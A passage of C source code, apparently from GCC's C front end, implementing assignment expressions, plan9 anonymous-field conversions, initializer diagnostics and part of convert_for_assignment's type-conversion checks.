ret = build2 (C_MAYBE_CONST_EXPR, TREE_TYPE (ret), type_expr, ret);
C_MAYBE_CONST_EXPR_NON_CONST (ret) = !(type_expr_const
&& inner_expr_const);
SET_EXPR_LOCATION (ret, loc);
}
if (!EXPR_HAS_LOCATION (ret))
protected_set_expr_location (ret, loc);
/* C++ does not permits types to be defined in a cast, but it
allows references to incomplete types. */
if (warn_cxx_compat && type_name->specs->typespec_kind == ctsk_tagdef)
warning_at (loc, OPT_Wc___compat,
"defining a type in a cast is invalid in C++");
return ret;
}
/* Build an assignment expression of lvalue LHS from value RHS.
If LHS_ORIGTYPE is not NULL, it is the original type of LHS, which
may differ from TREE_TYPE (LHS) for an enum bitfield.
MODIFYCODE is the code for a binary operator that we use
to combine the old value of LHS with RHS to get the new value.
Or else MODIFYCODE is NOP_EXPR meaning do a simple assignment.
If RHS_ORIGTYPE is not NULL_TREE, it is the original type of RHS,
which may differ from TREE_TYPE (RHS) for an enum value.
LOCATION is the location of the MODIFYCODE operator.
RHS_LOC is the location of the RHS. */
tree
build_modify_expr (location_t location, tree lhs, tree lhs_origtype,
enum tree_code modifycode,
location_t rhs_loc, tree rhs, tree rhs_origtype)
{
tree result;
tree newrhs;
tree rhseval = NULL_TREE;
tree lhstype = TREE_TYPE (lhs);
tree olhstype = lhstype;
bool npc;
bool is_atomic_op;
/* Types that aren't fully specified cannot be used in assignments. */
lhs = require_complete_type (location, lhs);
/* Avoid duplicate error messages from operands that had errors. */
if (TREE_CODE (lhs) == ERROR_MARK || TREE_CODE (rhs) == ERROR_MARK)
return error_mark_node;
/* Ensure an error for assigning a non-lvalue array to an array in
C90. */
if (TREE_CODE (lhstype) == ARRAY_TYPE)
{
error_at (location, "assignment to expression with array type");
return error_mark_node;
}
/* For ObjC properties, defer this check. */
if (!objc_is_property_ref (lhs) && !lvalue_or_else (location, lhs, lv_assign))
return error_mark_node;
is_atomic_op = really_atomic_lvalue (lhs);
newrhs = rhs;
if (TREE_CODE (lhs) == C_MAYBE_CONST_EXPR)
{
tree inner = build_modify_expr (location, C_MAYBE_CONST_EXPR_EXPR (lhs),
lhs_origtype, modifycode, rhs_loc, rhs,
rhs_origtype);
if (inner == error_mark_node)
return error_mark_node;
result = build2 (C_MAYBE_CONST_EXPR, TREE_TYPE (inner),
C_MAYBE_CONST_EXPR_PRE (lhs), inner);
gcc_assert (!C_MAYBE_CONST_EXPR_INT_OPERANDS (lhs));
C_MAYBE_CONST_EXPR_NON_CONST (result) = 1;
protected_set_expr_location (result, location);
return result;
}
/* If a binary op has been requested, combine the old LHS value with the RHS
producing the value we should actually store into the LHS. */
if (modifycode != NOP_EXPR)
{
lhs = c_fully_fold (lhs, false, NULL, true);
lhs = stabilize_reference (lhs);
/* Construct the RHS for any non-atomic compound assignemnt. */
if (!is_atomic_op)
{
/* If in LHS op= RHS the RHS has side-effects, ensure they
are preevaluated before the rest of the assignment expression's
side-effects, because RHS could contain e.g. function calls
that modify LHS. */
if (TREE_SIDE_EFFECTS (rhs))
{
if (TREE_CODE (rhs) == EXCESS_PRECISION_EXPR)
newrhs = save_expr (TREE_OPERAND (rhs, 0));
else
newrhs = save_expr (rhs);
rhseval = newrhs;
if (TREE_CODE (rhs) == EXCESS_PRECISION_EXPR)
newrhs = build1 (EXCESS_PRECISION_EXPR, TREE_TYPE (rhs),
newrhs);
}
newrhs = build_binary_op (location,
modifycode, lhs, newrhs, true);
/* The original type of the right hand side is no longer
meaningful. */
rhs_origtype = NULL_TREE;
}
}
if (c_dialect_objc ())
{
/* Check if we are modifying an Objective-C property reference;
if so, we need to generate setter calls. */
if (TREE_CODE (newrhs) == EXCESS_PRECISION_EXPR)
result = objc_maybe_build_modify_expr (lhs, TREE_OPERAND (newrhs, 0));
else
result = objc_maybe_build_modify_expr (lhs, newrhs);
if (result)
goto return_result;
/* Else, do the check that we postponed for Objective-C. */
if (!lvalue_or_else (location, lhs, lv_assign))
return error_mark_node;
}
/* Give an error for storing in something that is 'const'. */
if (TYPE_READONLY (lhstype)
|| (RECORD_OR_UNION_TYPE_P (lhstype)
&& C_TYPE_FIELDS_READONLY (lhstype)))
{
readonly_error (location, lhs, lv_assign);
return error_mark_node;
}
else if (TREE_READONLY (lhs))
readonly_warning (lhs, lv_assign);
/* If storing into a structure or union member,
it has probably been given type `int'.
Compute the type that would go with
the actual amount of storage the member occupies. */
if (TREE_CODE (lhs) == COMPONENT_REF
&& (TREE_CODE (lhstype) == INTEGER_TYPE
|| TREE_CODE (lhstype) == BOOLEAN_TYPE
|| TREE_CODE (lhstype) == REAL_TYPE
|| TREE_CODE (lhstype) == ENUMERAL_TYPE))
lhstype = TREE_TYPE (get_unwidened (lhs, 0));
/* If storing in a field that is in actuality a short or narrower than one,
we must store in the field in its actual type. */
if (lhstype != TREE_TYPE (lhs))
{
lhs = copy_node (lhs);
TREE_TYPE (lhs) = lhstype;
}
/* Issue -Wc++-compat warnings about an assignment to an enum type
when LHS does not have its original type. This happens for,
e.g., an enum bitfield in a struct. */
if (warn_cxx_compat
&& lhs_origtype != NULL_TREE
&& lhs_origtype != lhstype
&& TREE_CODE (lhs_origtype) == ENUMERAL_TYPE)
{
tree checktype = (rhs_origtype != NULL_TREE
? rhs_origtype
: TREE_TYPE (rhs));
if (checktype != error_mark_node
&& (TYPE_MAIN_VARIANT (checktype) != TYPE_MAIN_VARIANT (lhs_origtype)
|| (is_atomic_op && modifycode != NOP_EXPR)))
warning_at (location, OPT_Wc___compat,
"enum conversion in assignment is invalid in C++");
}
/* If the lhs is atomic, remove that qualifier. */
if (is_atomic_op)
{
lhstype = build_qualified_type (lhstype,
(TYPE_QUALS (lhstype)
& ~TYPE_QUAL_ATOMIC));
olhstype = build_qualified_type (olhstype,
(TYPE_QUALS (lhstype)
& ~TYPE_QUAL_ATOMIC));
}
/* Convert new value to destination type. Fold it first, then
restore any excess precision information, for the sake of
conversion warnings. */
if (!(is_atomic_op && modifycode != NOP_EXPR))
{
tree rhs_semantic_type = NULL_TREE;
if (TREE_CODE (newrhs) == EXCESS_PRECISION_EXPR)
{
rhs_semantic_type = TREE_TYPE (newrhs);
newrhs = TREE_OPERAND (newrhs, 0);
}
npc = null_pointer_constant_p (newrhs);
newrhs = c_fully_fold (newrhs, false, NULL);
if (rhs_semantic_type)
newrhs = build1 (EXCESS_PRECISION_EXPR, rhs_semantic_type, newrhs);
newrhs = convert_for_assignment (location, rhs_loc, lhstype, newrhs,
rhs_origtype, ic_assign, npc,
NULL_TREE, NULL_TREE, 0);
if (TREE_CODE (newrhs) == ERROR_MARK)
return error_mark_node;
}
/* Emit ObjC write barrier, if necessary. */
if (c_dialect_objc () && flag_objc_gc)
{
result = objc_generate_write_barrier (lhs, modifycode, newrhs);
if (result)
{
protected_set_expr_location (result, location);
goto return_result;
}
}
/* Scan operands. */
if (is_atomic_op)
result = build_atomic_assign (location, lhs, modifycode, newrhs, false);
else
{
result = build2 (MODIFY_EXPR, lhstype, lhs, newrhs);
TREE_SIDE_EFFECTS (result) = 1;
protected_set_expr_location (result, location);
}
/* If we got the LHS in a different type for storing in,
convert the result back to the nominal type of LHS
so that the value we return always has the same type
as the LHS argument. */
if (olhstype == TREE_TYPE (result))
goto return_result;
result = convert_for_assignment (location, rhs_loc, olhstype, result,
rhs_origtype, ic_assign, false, NULL_TREE,
NULL_TREE, 0);
protected_set_expr_location (result, location);
return_result:
if (rhseval)
result = build2 (COMPOUND_EXPR, TREE_TYPE (result), rhseval, result);
return result;
}
/* Return whether STRUCT_TYPE has an anonymous field with type TYPE.
This is used to implement -fplan9-extensions. */
static bool
find_anonymous_field_with_type (tree struct_type, tree type)
{
tree field;
bool found;
gcc_assert (RECORD_OR_UNION_TYPE_P (struct_type));
found = false;
for (field = TYPE_FIELDS (struct_type);
field != NULL_TREE;
field = TREE_CHAIN (field))
{
tree fieldtype = (TYPE_ATOMIC (TREE_TYPE (field))
? c_build_qualified_type (TREE_TYPE (field),
TYPE_QUAL_ATOMIC)
: TYPE_MAIN_VARIANT (TREE_TYPE (field)));
if (DECL_NAME (field) == NULL
&& comptypes (type, fieldtype))
{
if (found)
return false;
found = true;
}
else if (DECL_NAME (field) == NULL
&& RECORD_OR_UNION_TYPE_P (TREE_TYPE (field))
&& find_anonymous_field_with_type (TREE_TYPE (field), type))
{
if (found)
return false;
found = true;
}
}
return found;
}
/* RHS is an expression whose type is pointer to struct. If there is
an anonymous field in RHS with type TYPE, then return a pointer to
that field in RHS. This is used with -fplan9-extensions. This
returns NULL if no conversion could be found. */
static tree
convert_to_anonymous_field (location_t location, tree type, tree rhs)
{
tree rhs_struct_type, lhs_main_type;
tree field, found_field;
bool found_sub_field;
tree ret;
gcc_assert (POINTER_TYPE_P (TREE_TYPE (rhs)));
rhs_struct_type = TREE_TYPE (TREE_TYPE (rhs));
gcc_assert (RECORD_OR_UNION_TYPE_P (rhs_struct_type));
gcc_assert (POINTER_TYPE_P (type));
lhs_main_type = (TYPE_ATOMIC (TREE_TYPE (type))
? c_build_qualified_type (TREE_TYPE (type),
TYPE_QUAL_ATOMIC)
: TYPE_MAIN_VARIANT (TREE_TYPE (type)));
found_field = NULL_TREE;
found_sub_field = false;
for (field = TYPE_FIELDS (rhs_struct_type);
field != NULL_TREE;
field = TREE_CHAIN (field))
{
if (DECL_NAME (field) != NULL_TREE
|| !RECORD_OR_UNION_TYPE_P (TREE_TYPE (field)))
continue;
tree fieldtype = (TYPE_ATOMIC (TREE_TYPE (field))
? c_build_qualified_type (TREE_TYPE (field),
TYPE_QUAL_ATOMIC)
: TYPE_MAIN_VARIANT (TREE_TYPE (field)));
if (comptypes (lhs_main_type, fieldtype))
{
if (found_field != NULL_TREE)
return NULL_TREE;
found_field = field;
}
else if (find_anonymous_field_with_type (TREE_TYPE (field),
lhs_main_type))
{
if (found_field != NULL_TREE)
return NULL_TREE;
found_field = field;
found_sub_field = true;
}
}
if (found_field == NULL_TREE)
return NULL_TREE;
ret = fold_build3_loc (location, COMPONENT_REF, TREE_TYPE (found_field),
build_fold_indirect_ref (rhs), found_field,
NULL_TREE);
ret = build_fold_addr_expr_loc (location, ret);
if (found_sub_field)
{
ret = convert_to_anonymous_field (location, type, ret);
gcc_assert (ret != NULL_TREE);
}
return ret;
}
/* Issue an error message for a bad initializer component.
GMSGID identifies the message.
The component name is taken from the spelling stack. */
static void ATTRIBUTE_GCC_DIAG (2,0)
error_init (location_t loc, const char *gmsgid, ...)
{
char *ofwhat;
auto_diagnostic_group d;
/* The gmsgid may be a format string with %< and %>. */
va_list ap;
va_start (ap, gmsgid);
bool warned = emit_diagnostic_valist (DK_ERROR, loc, -1, gmsgid, &ap);
va_end (ap);
ofwhat = print_spelling ((char *) alloca (spelling_length () + 1));
if (*ofwhat && warned)
inform (loc, "(near initialization for %qs)", ofwhat);
}
/* Issue a pedantic warning for a bad initializer component. OPT is
the option OPT_* (from options.h) controlling this warning or 0 if
it is unconditionally given. GMSGID identifies the message. The
component name is taken from the spelling stack. */
static void ATTRIBUTE_GCC_DIAG (3,0)
pedwarn_init (location_t loc, int opt, const char *gmsgid, ...)
{
/* Use the location where a macro was expanded rather than where
it was defined to make sure macros defined in system headers
but used incorrectly elsewhere are diagnosed. */
location_t exploc = expansion_point_location_if_in_system_header (loc);
auto_diagnostic_group d;
va_list ap;
va_start (ap, gmsgid);
bool warned = emit_diagnostic_valist (DK_PEDWARN, exploc, opt, gmsgid, &ap);
va_end (ap);
char *ofwhat = print_spelling ((char *) alloca (spelling_length () + 1));
if (*ofwhat && warned)
inform (exploc, "(near initialization for %qs)", ofwhat);
}
/* Issue a warning for a bad initializer component.
OPT is the OPT_W* value corresponding to the warning option that
controls this warning. GMSGID identifies the message. The
component name is taken from the spelling stack. */
static void
warning_init (location_t loc, int opt, const char *gmsgid)
{
char *ofwhat;
bool warned;
auto_diagnostic_group d;
/* Use the location where a macro was expanded rather than where
it was defined to make sure macros defined in system headers
but used incorrectly elsewhere are diagnosed. */
location_t exploc = expansion_point_location_if_in_system_header (loc);
/* The gmsgid may be a format string with %< and %>. */
warned = warning_at (exploc, opt, gmsgid);
ofwhat = print_spelling ((char *) alloca (spelling_length () + 1));
if (*ofwhat && warned)
inform (exploc, "(near initialization for %qs)", ofwhat);
}
/* If TYPE is an array type and EXPR is a parenthesized string
constant, warn if pedantic that EXPR is being used to initialize an
object of type TYPE. */
void
maybe_warn_string_init (location_t loc, tree type, struct c_expr expr)
{
if (pedantic
&& TREE_CODE (type) == ARRAY_TYPE
&& TREE_CODE (expr.value) == STRING_CST
&& expr.original_code != STRING_CST)
pedwarn_init (loc, OPT_Wpedantic,
"array initialized from parenthesized string constant");
}
/* Attempt to locate the parameter with the given index within FNDECL,
returning DECL_SOURCE_LOCATION (FNDECL) if it can't be found. */
static location_t
get_fndecl_argument_location (tree fndecl, int argnum)
{
int i;
tree param;
/* Locate param by index within DECL_ARGUMENTS (fndecl). */
for (i = 0, param = DECL_ARGUMENTS (fndecl);
i < argnum && param;
i++, param = TREE_CHAIN (param))
;
/* If something went wrong (e.g. if we have a builtin and thus no arguments),
return DECL_SOURCE_LOCATION (FNDECL). */
if (param == NULL)
return DECL_SOURCE_LOCATION (fndecl);
return DECL_SOURCE_LOCATION (param);
}
/* Issue a note about a mismatching argument for parameter PARMNUM
to FUNDECL, for types EXPECTED_TYPE and ACTUAL_TYPE.
Attempt to issue the note at the pertinent parameter of the decl;
failing that issue it at the location of FUNDECL; failing that
issue it at PLOC. */
static void
inform_for_arg (tree fundecl, location_t ploc, int parmnum,
tree expected_type, tree actual_type)
{
location_t loc;
if (fundecl && !DECL_IS_BUILTIN (fundecl))
loc = get_fndecl_argument_location (fundecl, parmnum - 1);
else
loc = ploc;
inform (loc,
"expected %qT but argument is of type %qT",
expected_type, actual_type);
}
/* Issue a warning when an argument of ARGTYPE is passed to a built-in
function FUNDECL declared without prototype to parameter PARMNUM of
PARMTYPE when ARGTYPE does not promote to PARMTYPE. */
static void
maybe_warn_builtin_no_proto_arg (location_t loc, tree fundecl, int parmnum,
tree parmtype, tree argtype)
{
tree_code parmcode = TREE_CODE (parmtype);
tree_code argcode = TREE_CODE (argtype);
tree promoted = c_type_promotes_to (argtype);
/* Avoid warning for enum arguments that promote to an integer type
of the same size/mode. */
if (parmcode == INTEGER_TYPE
&& argcode == ENUMERAL_TYPE
&& TYPE_MODE (parmtype) == TYPE_MODE (argtype))
return;
if ((parmcode == argcode
|| (parmcode == INTEGER_TYPE
&& argcode == ENUMERAL_TYPE))
&& TYPE_MAIN_VARIANT (parmtype) == TYPE_MAIN_VARIANT (promoted))
return;
/* This diagnoses even signed/unsigned mismatches. Those might be
safe in many cases but GCC may emit suboptimal code for them so
warning on those cases drives efficiency improvements. */
if (warning_at (loc, OPT_Wbuiltin_declaration_mismatch,
TYPE_MAIN_VARIANT (promoted) == argtype
? G_("%qD argument %d type is %qT where %qT is expected "
"in a call to built-in function declared without "
"prototype")
: G_("%qD argument %d promotes to %qT where %qT is expected "
"in a call to built-in function declared without "
"prototype"),
fundecl, parmnum, promoted, parmtype))
inform (DECL_SOURCE_LOCATION (fundecl),
"built-in %qD declared here",
fundecl);
}
/* Convert value RHS to type TYPE as preparation for an assignment to
an lvalue of type TYPE. If ORIGTYPE is not NULL_TREE, it is the
original type of RHS; this differs from TREE_TYPE (RHS) for enum
types. NULL_POINTER_CONSTANT says whether RHS was a null pointer
constant before any folding.
The real work of conversion is done by `convert'.
The purpose of this function is to generate error messages
for assignments that are not allowed in C.
ERRTYPE says whether it is argument passing, assignment,
initialization or return.
In the following example, '~' denotes where EXPR_LOC and '^' where
LOCATION point to:
f (var); [ic_argpass]
^ ~~~
x = var; [ic_assign]
^ ~~~;
int x = var; [ic_init]
^^^
return x; [ic_return]
^
FUNCTION is a tree for the function being called.
PARMNUM is the number of the argument, for printing in error messages.
WARNOPT may be set to a warning option to issue the corresponding warning
rather than an error for invalid conversions. Used for calls to built-in
functions declared without a prototype. */
static tree
convert_for_assignment (location_t location, location_t expr_loc, tree type,
tree rhs, tree origtype, enum impl_conv errtype,
bool null_pointer_constant, tree fundecl,
tree function, int parmnum, int warnopt /* = 0 */)
{
enum tree_code codel = TREE_CODE (type);
tree orig_rhs = rhs;
tree rhstype;
enum tree_code coder;
tree rname = NULL_TREE;
bool objc_ok = false;
/* Use the expansion point location to handle cases such as user's
function returning a wrong-type macro defined in a system header. */
location = expansion_point_location_if_in_system_header (location);
if (errtype == ic_argpass)
{
tree selector;
/* Change pointer to function to the function itself for
diagnostics. */
if (TREE_CODE (function) == ADDR_EXPR
&& TREE_CODE (TREE_OPERAND (function, 0)) == FUNCTION_DECL)
function = TREE_OPERAND (function, 0);
/* Handle an ObjC selector specially for diagnostics. */
selector = objc_message_selector ();
rname = function;
if (selector && parmnum > 2)
{
rname = selector;
parmnum -= 2;
}
}
/* This macro is used to emit diagnostics to ensure that all format
strings are complete sentences, visible to gettext and checked at
compile time. */
#define PEDWARN_FOR_ASSIGNMENT(LOCATION, PLOC, OPT, AR, AS, IN, RE) \
do { \
switch (errtype) \
{ \
case ic_argpass: \
{ \
auto_diagnostic_group d; \
if (pedwarn (PLOC, OPT, AR, parmnum, rname)) \
inform_for_arg (fundecl, (PLOC), parmnum, type, rhstype); \
} \
break; \
case ic_assign: \
pedwarn (LOCATION, OPT, AS); \
break; \
case ic_init: \
pedwarn_init (LOCATION, OPT, IN); \
break; \
case ic_return: \
pedwarn (LOCATION, OPT, RE); \
break; \
default: \
gcc_unreachable (); \
} \
} while (0)
/* This macro is used to emit diagnostics to ensure that all format
strings are complete sentences, visible to gettext and checked at
compile time. It is the same as PEDWARN_FOR_ASSIGNMENT but with an
extra parameter to enumerate qualifiers. */
#define PEDWARN_FOR_QUALIFIERS(LOCATION, PLOC, OPT, AR, AS, IN, RE, QUALS) \
do { \
switch (errtype) \
{ \
case ic_argpass: \
{ \
auto_diagnostic_group d; \
if (pedwarn (PLOC, OPT, AR, parmnum, rname, QUALS)) \
inform_for_arg (fundecl, (PLOC), parmnum, type, rhstype); \
} \
break; \
case ic_assign: \
pedwarn (LOCATION, OPT, AS, QUALS); \
break; \
case ic_init: \
pedwarn (LOCATION, OPT, IN, QUALS); \
break; \
case ic_return: \
pedwarn (LOCATION, OPT, RE, QUALS); \
break; \
default: \
gcc_unreachable (); \
} \
} while (0)
/* This macro is used to emit diagnostics to ensure that all format
strings are complete sentences, visible to gettext and checked at
compile time. It is the same as PEDWARN_FOR_QUALIFIERS but uses
warning_at instead of pedwarn. */
#define WARNING_FOR_QUALIFIERS(LOCATION, PLOC, OPT, AR, AS, IN, RE, QUALS) \
do { \
switch (errtype) \
{ \
case ic_argpass: \
{ \
auto_diagnostic_group d; \
if (warning_at (PLOC, OPT, AR, parmnum, rname, QUALS)) \
inform_for_arg (fundecl, (PLOC), parmnum, type, rhstype); \
} \
break; \
case ic_assign: \
warning_at (LOCATION, OPT, AS, QUALS); \
break; \
case ic_init: \
warning_at (LOCATION, OPT, IN, QUALS); \
break; \
case ic_return: \
warning_at (LOCATION, OPT, RE, QUALS); \
break; \
default: \
gcc_unreachable (); \
} \
} while (0)
if (TREE_CODE (rhs) == EXCESS_PRECISION_EXPR)
rhs = TREE_OPERAND (rhs, 0);
rhstype = TREE_TYPE (rhs);
coder = TREE_CODE (rhstype);
if (coder == ERROR_MARK)
return error_mark_node;
if (c_dialect_objc ())
{
int parmno;
switch (errtype)
{
case ic_return:
parmno = 0;
break;
case ic_assign:
parmno = -1;
break;
case ic_init:
parmno = -2;
break;
default:
parmno = parmnum;
break;
}
objc_ok = objc_compare_types (type, rhstype, parmno, rname);
}
if (warn_cxx_compat)
{
tree checktype = origtype != NULL_TREE ? origtype : rhstype;
if (checktype != error_mark_node
&& TREE_CODE (type) == ENUMERAL_TYPE
&& TYPE_MAIN_VARIANT (checktype) != TYPE_MAIN_VARIANT (type))
switch (errtype)
{
case ic_argpass:
if (pedwarn (expr_loc, OPT_Wc___compat, "enum conversion when "
"passing argument %d of %qE is invalid in C++",
parmnum, rname))
inform ((fundecl && !DECL_IS_BUILTIN (fundecl))
? DECL_SOURCE_LOCATION (fundecl) : expr_loc,
"expected %qT but argument is of type %qT",
type, rhstype);
break;
case ic_assign:
pedwarn (location, OPT_Wc___compat, "enum conversion from %qT to "
"%qT in assignment is invalid in C++", rhstype, type);
break;
case ic_init:
pedwarn_init (location, OPT_Wc___compat, "enum conversion from "
"%qT to %qT in initialization is invalid in C++",
rhstype, type);
break;
case ic_return:
pedwarn (location, OPT_Wc___compat, "enum conversion from %qT to "
"%qT in return is invalid in C++", rhstype, type);
break;
default:
gcc_unreachable ();
}
}
if (warn_enum_conversion)
{
tree checktype = origtype != NULL_TREE ? origtype : rhstype;
if (checktype != error_mark_node
&& TREE_CODE (checktype) == ENUMERAL_TYPE
&& TREE_CODE (type) == ENUMERAL_TYPE
&& TYPE_MAIN_VARIANT (checktype) != TYPE_MAIN_VARIANT (type))
{
gcc_rich_location loc (location);
warning_at (&loc, OPT_Wenum_conversion,
"implicit conversion from %qT to %qT",
checktype, type);
}
}
if (TYPE_MAIN_VARIANT (type) == TYPE_MAIN_VARIANT (rhstype))
{
warn_for_address_or_pointer_of_packed_member (type, orig_rhs);
return rhs;
}
if (coder == VOID_TYPE)
{
/* Except for passing an argument to an unprototyped function,
this is a constraint violation. When passing an argument to
an unprototyped function, it is compile-time undefined;
making it a constraint in that case was rejected in
DR#252. */
const char msg[] = "void value not ignored as it ought to be";
if (warnopt)
warning_at (location, warnopt, msg);
else
error_at (location, msg);
return error_mark_node;
}
rhs = require_complete_type (location, rhs);
if (rhs == error_mark_node)
return error_mark_node;
if (coder == POINTER_TYPE && reject_gcc_builtin (rhs))
return error_mark_node;
/* A non-reference type can convert to a reference. This handles
va_start, va_copy and possibly port built-ins. */
if (codel == REFERENCE_TYPE && coder != REFERENCE_TYPE)
{
if (!lvalue_p (rhs))
{
const char msg[] = "cannot pass rvalue to reference parameter";
if (warnopt)
warning_at (location, warnopt, msg);
else
error_at (location, msg);
return error_mark_node;
}
if (!c_mark_addressable (rhs))
return error_mark_node;
rhs = build1 (ADDR_EXPR, build_pointer_type (TREE_TYPE (rhs)), rhs);
SET_EXPR_LOCATION (rhs, location);
rhs = convert_for_assignment (location, expr_loc,
build_pointer_type (TREE_TYPE (type)),
rhs, origtype, errtype,
null_pointer_constant, fundecl, function,
parmnum, warnopt);
if (rhs == error_mark_node)
return error_mark_node;
rhs = build1 (NOP_EXPR, type, rhs);
SET_EXPR_LOCATION (rhs, location);
return rhs;
}
/* Some types can interconvert without explicit casts. */
else if (codel == VECTOR_TYPE && coder == VECTOR_TYPE
&& vector_types_convertible_p (type, TREE_TYPE (rhs), true))
return convert (type, rhs);
/* Arithmetic types all interconvert, and enum is treated like int. */
else if ((codel == INTEGER_TYPE || codel == REAL_TYPE
|| codel == FIXED_POINT_TYPE
|| codel == ENUMERAL_TYPE || codel == COMPLEX_TYPE
|| codel == BOOLEAN_TYPE)
&& (coder == INTEGER_TYPE || coder == REAL_TYPE
|| coder == FIXED_POINT_TYPE
|| coder == ENUMERAL_TYPE || coder == COMPLEX_TYPE
|| coder == BOOLEAN_TYPE))
{
if (warnopt && errtype == ic_argpass)
maybe_warn_builtin_no_proto_arg (expr_loc, fundecl, parmnum, type,
rhstype);
bool save = in_late_binary_op;
if (codel == BOOLEAN_TYPE || codel == COMPLEX_TYPE
|| (coder == REAL_TYPE
&& (codel == INTEGER_TYPE || codel == ENUMERAL_TYPE)
&& sanitize_flags_p (SANITIZE_FLOAT_CAST)))
in_late_binary_op = true;
tree ret = convert_and_check (expr_loc != UNKNOWN_LOCATION
? expr_loc : location, type, orig_rhs);
in_late_binary_op = save;
return ret;
}
/* Aggregates in different TUs might need conversion. */
if ((codel == RECORD_TYPE || codel == UNION_TYPE)
&& codel == coder
&& comptypes (type, rhstype))
return convert_and_check (expr_loc != UNKNOWN_LOCATION
? expr_loc : location, type, rhs);
/* Conversion to a transparent union or record from its member types.
This applies only to function arguments. */
if (((codel == UNION_TYPE || codel == RECORD_TYPE)
&& TYPE_TRANSPARENT_AGGR (type))
&& errtype == ic_argpass)
{
tree memb, marginal_memb = NULL_TREE;
for (memb = TYPE_FIELDS (type); memb ; memb = DECL_CHAIN (memb))
{
tree memb_type = TREE_TYPE (memb);
if (comptypes (TYPE_MAIN_VARIANT (memb_type),
TYPE_MAIN_VARIANT (rhstype)))
break;
if (TREE_CODE (memb_type) != POINTER_TYPE)
continue;
if (coder == POINTER_TYPE)
{
tree ttl = TREE_TYPE (memb_type);
tree ttr = TREE_TYPE (rhstype);
/* Any non-function converts to a [const][volatile] void *
and vice versa; otherwise, targets must be the same.
Meanwhile, the lhs target must have all the qualifiers of
the rhs. */
if ((VOID_TYPE_P (ttl) && !TYPE_ATOMIC (ttl))
|| (VOID_TYPE_P (ttr) && !TYPE_ATOMIC (ttr))
|| comp_target_types (location, memb_type, rhstype))
{
int lquals = TYPE_QUALS (ttl) & ~TYPE_QUAL_ATOMIC;
int rquals = TYPE_QUALS (ttr) & ~TYPE_QUAL_ATOMIC;
/* If this type won't generate any warnings, use it. */
if (lquals == rquals
|| ((TREE_CODE (ttr) == FUNCTION_TYPE
&& TREE_CODE (ttl) == FUNCTION_TYPE)
? ((lquals | rquals) == rquals)
: ((lquals | rquals) == lquals)))
break;
/* Keep looking for a better type, but remember this one. */
if (!marginal_memb)
marginal_memb = memb;
}
}
/* Can convert integer zero to any pointer type. */
if (null_pointer_constant)
{
rhs = null_pointer_node;
break;
}
}
if (memb || marginal_memb)
{
if (!memb)
{
/* We have only a marginally acceptable member type;
it needs a warning. */
tree ttl = TREE_TYPE (TREE_TYPE (marginal_memb));
tree ttr = TREE_TYPE (rhstype);
/* Const and volatile mean something different for function
types, so the usual warnings are not appropriate. */
if (TREE_CODE (ttr) == FUNCTION_TYPE
&& TREE_CODE (ttl) == FUNCTION_TYPE)
{
/* Because const and volatile on functions are
restrictions that say the function will not do
certain things, it is okay to use a const or volatile
function where an ordinary one is wanted, but not
vice-versa. */
if (TYPE_QUALS_NO_ADDR_SPACE (ttl)
& ~TYPE_QUALS_NO_ADDR_SPACE (ttr))
PEDWARN_FOR_QUALIFIERS (location, expr_loc,
OPT_Wdiscarded_qualifiers,
G_("passing argument %d of %qE "
"makes %q#v qualified function "
"pointer from unqualified"),
G_("assignment makes %q#v qualified "
"function pointer from "
"unqualified"),
G_("initialization makes %q#v qualified "
"function pointer from "
"unqualified"),
G_("return makes %q#v qualified function "
"pointer from unqualified"),
TYPE_QUALS (ttl) & ~TYPE_QUALS (ttr));
}
else if (TYPE_QUALS_NO_ADDR_SPACE (ttr)
& ~TYPE_QUALS_NO_ADDR_SPACE (ttl))
PEDWARN_FOR_QUALIFIERS (location, expr_loc,
OPT_Wdiscarded_qualifiers,
G_("passing argument %d of %qE discards "
"%qv qualifier from pointer target type"),
G_("assignment discards %qv qualifier "
"from pointer target type"),
G_("initialization discards %qv qualifier "
"from pointer target type"),
G_("return discards %qv qualifier from "
"pointer target type"),
TYPE_QUALS (ttr) & ~TYPE_QUALS (ttl));
memb = marginal_memb;
}
if (!fundecl || !DECL_IN_SYSTEM_HEADER (fundecl))
pedwarn (location, OPT_Wpedantic,
"ISO C prohibits argument conversion to union type");
rhs = fold_convert_loc (location, TREE_TYPE (memb), rhs);
return build_constructor_single (type, memb, rhs);
}
}
/* Conversions among pointers */
else if ((codel == POINTER_TYPE || codel == REFERENCE_TYPE)
&& (coder == codel))
{
/* If RHS refers to a built-in declared without a prototype
BLTIN is the declaration of the built-in with a prototype
and RHSTYPE is set to the actual type of the built-in. */
tree bltin;
rhstype = type_or_builtin_type (rhs, &bltin);
tree ttl = TREE_TYPE (type);
tree ttr = TREE_TYPE (rhstype);
tree mvl = ttl;
tree mvr = ttr;
bool is_opaque_pointer;
int target_cmp = 0; /* Cache comp_target_types () result. */
addr_space_t asl;
addr_space_t asr;
if (TREE_CODE (mvl) != ARRAY_TYPE)
mvl = (TYPE_ATOMIC (mvl)
? c_build_qualified_type (TYPE_MAIN_VARIANT (mvl),
TYPE_QUAL_ATOMIC)
: TYPE_MAIN_VARIANT (mvl));
if (TREE_CODE (mvr) != ARRAY_TYPE)
mvr = (TYPE_ATOMIC (mvr)
? c_build_qualified_type (TYPE_MAIN_VARIANT (mvr),
TYPE_QUAL_ATOMIC)
: TYPE_MAIN_VARIANT (mvr));
/* Opaque pointers are treated like void pointers. */
is_opaque_pointer = vector_targets_convertible_p (ttl, ttr);
/* The Plan 9 compiler permits a pointer to a struct to be
automatically converted into a pointer to an anonymous field
within the struct. */
if (flag_plan9_extensions
&& RECORD_OR_UNION_TYPE_P (mvl)
&& RECORD_OR_UNION_TYPE_P (mvr)
&& mvl != mvr)
{
tree new_rhs = convert_to_anonymous_field (location, type, rhs);
if (new_rhs != NULL_TREE)
{
rhs = new_rhs;
rhstype = TREE_TYPE (rhs);
coder = TREE_CODE (rhstype);
ttr = TREE_TYPE (rhstype);
mvr = TYPE_MAIN_VARIANT (ttr);
}
}
/* C++ does not allow the implicit conversion void* -> T*. However,
for the purpose of reducing the number of false positives, we
tolerate the special case of
int *p = NULL;
where NULL is typically defined in C to be '(void *) 0'. */
if (VOID_TYPE_P (ttr) && rhs != null_pointer_node && !VOID_TYPE_P (ttl))
warning_at (errtype == ic_argpass ? expr_loc : location,
OPT_Wc___compat,
"request for implicit conversion "
"from %qT to %qT not permitted in C++", rhstype, type);
/* See if the pointers point to incompatible address spaces. */
asl = TYPE_ADDR_SPACE (ttl);
asr = TYPE_ADDR_SPACE (ttr);
if (!null_pointer_constant_p (rhs)
&& asr != asl && !targetm.addr_space.subset_p (asr, asl))
{
switch (errtype)
{
